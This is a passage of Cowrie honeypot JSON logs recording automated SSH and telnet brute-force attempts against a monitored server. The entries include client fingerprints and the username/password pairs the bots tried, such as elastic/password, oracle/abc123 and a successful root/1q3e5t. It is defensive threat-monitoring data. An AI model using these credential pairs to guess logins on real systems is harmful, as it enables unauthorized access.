{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:08:44.309493Z","src_ip":"212.227.235.229","session":"328156ad2cd9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:08:44.310313Z","src_ip":"212.227.235.229","session":"328156ad2cd9"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"password","message":"login attempt [elastic/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:08:50.455013Z","src_ip":"212.227.235.229","session":"328156ad2cd9"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:08:52.476441Z","src_ip":"212.227.235.229","session":"328156ad2cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56544,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2c4ad11c8e9","protocol":"ssh","message":"New connection: 212.227.125.160:56544 (1.2.3.4:22) [session: b2c4ad11c8e9]","sensor":"my-vps","timestamp":"2025-08-31T02:09:06.299284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:09:06.894177Z","src_ip":"212.227.125.160","session":"b2c4ad11c8e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:09:06.894915Z","src_ip":"212.227.125.160","session":"b2c4ad11c8e9"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"password","message":"login attempt [elastic/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:09:09.327975Z","src_ip":"212.227.125.160","session":"b2c4ad11c8e9"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:09:10.917321Z","src_ip":"212.227.125.160","session":"b2c4ad11c8e9"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:09:31.320013Z","src_ip":"203.195.83.78","session":"0a9d18b00383"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47384,"dst_ip":"1.2.3.4","dst_port":22,"session":"15f0a1e38f51","protocol":"ssh","message":"New connection: 212.227.235.229:47384 (1.2.3.4:22) [session: 15f0a1e38f51]","sensor":"my-vps","timestamp":"2025-08-31T02:09:46.733624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:09:47.879887Z","src_ip":"212.227.235.229","session":"15f0a1e38f51"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:09:47.881243Z","src_ip":"212.227.235.229","session":"15f0a1e38f51"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"password1","message":"login attempt [elastic/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:09:53.814915Z","src_ip":"212.227.235.229","session":"15f0a1e38f51"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:09:55.808309Z","src_ip":"212.227.235.229","session":"15f0a1e38f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50568,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b62d4ee3801","protocol":"telnet","message":"New connection: 212.227.235.229:50568 (1.2.3.4:23) [session: 6b62d4ee3801]","sensor":"my-vps","timestamp":"2025-08-31T02:10:07.727904Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38048,"dst_ip":"1.2.3.4","dst_port":22,"session":"d371469d6b38","protocol":"ssh","message":"New connection: 212.227.125.160:38048 (1.2.3.4:22) [session: d371469d6b38]","sensor":"my-vps","timestamp":"2025-08-31T02:10:09.997890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:10:10.497888Z","src_ip":"212.227.125.160","session":"d371469d6b38"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:10:10.498625Z","src_ip":"212.227.125.160","session":"d371469d6b38"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"password1","message":"login attempt [elastic/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:12.686866Z","src_ip":"212.227.125.160","session":"d371469d6b38"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:10:14.204455Z","src_ip":"212.227.125.160","session":"d371469d6b38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32878,"dst_ip":"1.2.3.4","dst_port":22,"session":"39cc4ab7d210","protocol":"ssh","message":"New connection: 212.227.235.229:32878 (1.2.3.4:22) [session: 39cc4ab7d210]","sensor":"my-vps","timestamp":"2025-08-31T02:10:30.441321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:10:30.452940Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:10:30.577305Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:31.121133Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:32.249310Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd123","message":"login attempt [oracle/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:33.377057Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd1234","message":"login attempt [oracle/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:34.504572Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc1234","message":"login attempt [oracle/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:35.632683Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:10:36.760374Z","src_ip":"212.227.235.229","session":"39cc4ab7d210"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57112,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a6b2359e4a2","protocol":"ssh","message":"New connection: 212.227.235.229:57112 (1.2.3.4:22) [session: 1a6b2359e4a2]","sensor":"my-vps","timestamp":"2025-08-31T02:10:50.844790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:10:51.837687Z","src_ip":"212.227.235.229","session":"1a6b2359e4a2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:10:51.838386Z","src_ip":"212.227.235.229","session":"1a6b2359e4a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42627,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c659a1847a9","protocol":"telnet","message":"New connection: 212.227.235.229:42627 (1.2.3.4:23) [session: 7c659a1847a9]","sensor":"my-vps","timestamp":"2025-08-31T02:10:55.004574Z"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"admin123","message":"login attempt [elastic/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:10:57.840887Z","src_ip":"212.227.235.229","session":"1a6b2359e4a2"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:10:59.748716Z","src_ip":"212.227.235.229","session":"1a6b2359e4a2"}
{"eventid":"cowrie.login.success","username":"root","password":"1q3e5t","message":"login attempt [root/1q3e5t] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:11:09.368682Z","src_ip":"212.227.235.229","session":"6b62d4ee3801"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:11:09.387049Z","src_ip":"212.227.235.229","session":"6b62d4ee3801"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47690,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4d65abf3be0","protocol":"ssh","message":"New connection: 212.227.125.160:47690 (1.2.3.4:22) [session: a4d65abf3be0]","sensor":"my-vps","timestamp":"2025-08-31T02:11:13.469361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:11:14.137217Z","src_ip":"212.227.125.160","session":"a4d65abf3be0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:11:14.138360Z","src_ip":"212.227.125.160","session":"a4d65abf3be0"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"admin123","message":"login attempt [elastic/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:11:16.007991Z","src_ip":"212.227.125.160","session":"a4d65abf3be0"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:11:17.733551Z","src_ip":"212.227.125.160","session":"a4d65abf3be0"}
{"eventid":"cowrie.session.closed","duration":31.3389253616333,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:11:26.343407Z","src_ip":"212.227.235.229","session":"7c659a1847a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38274,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c8cc5d5813","protocol":"ssh","message":"New connection: 212.227.235.229:38274 (1.2.3.4:22) [session: c2c8cc5d5813]","sensor":"my-vps","timestamp":"2025-08-31T02:11:54.296422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:11:55.437333Z","src_ip":"212.227.235.229","session":"c2c8cc5d5813"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:11:55.438072Z","src_ip":"212.227.235.229","session":"c2c8cc5d5813"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"root123","message":"login attempt [elastic/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:12:00.144357Z","src_ip":"212.227.235.229","session":"c2c8cc5d5813"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:12:02.007664Z","src_ip":"212.227.235.229","session":"c2c8cc5d5813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56890,"dst_ip":"1.2.3.4","dst_port":22,"session":"9389d6f0193e","protocol":"ssh","message":"New connection: 212.227.125.160:56890 (1.2.3.4:22) [session: 9389d6f0193e]","sensor":"my-vps","timestamp":"2025-08-31T02:12:16.722860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:12:17.037718Z","src_ip":"212.227.125.160","session":"9389d6f0193e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:12:17.038580Z","src_ip":"212.227.125.160","session":"9389d6f0193e"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"root123","message":"login attempt [elastic/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:12:18.755240Z","src_ip":"212.227.125.160","session":"9389d6f0193e"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:12:20.376511Z","src_ip":"212.227.125.160","session":"9389d6f0193e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":58576,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b7181b9f00","protocol":"ssh","message":"New connection: 41.226.27.251:58576 (1.2.3.4:22) [session: 34b7181b9f00]","sensor":"my-vps","timestamp":"2025-08-31T02:12:25.953991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:12:25.956152Z","src_ip":"41.226.27.251","session":"34b7181b9f00"}
